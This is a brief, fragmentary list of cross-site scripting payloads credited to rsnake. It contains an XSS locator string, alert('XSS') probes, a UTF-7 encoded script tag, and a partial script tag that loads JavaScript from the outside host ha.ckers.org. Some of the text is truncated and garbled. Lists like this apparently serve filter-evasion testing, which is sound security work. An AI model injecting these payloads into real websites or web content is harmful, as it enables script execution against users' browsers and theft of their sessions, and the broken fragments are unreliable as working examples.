# credit to rsnake '';!--"=&{()} SRC= alert(\"XSS\") '"--> +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- PT SRC="http://ha.ckers.org/xss.js">